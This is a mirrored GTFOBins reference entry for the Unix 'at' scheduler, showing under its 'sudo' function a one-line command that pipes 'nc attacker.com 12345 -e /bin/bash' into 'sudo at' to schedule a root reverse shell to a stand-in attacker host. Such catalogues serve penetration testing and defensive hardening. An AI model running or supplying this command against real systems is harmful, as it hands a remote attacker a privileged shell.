1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
GTFOBins.github.io/_gtfobins/at.md
2021-01-15 20:34:57 +01:00

242 B

description functions
at is a command-line utility that allows you to schedule commands to be executed at a particular time.
sudo
code
echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes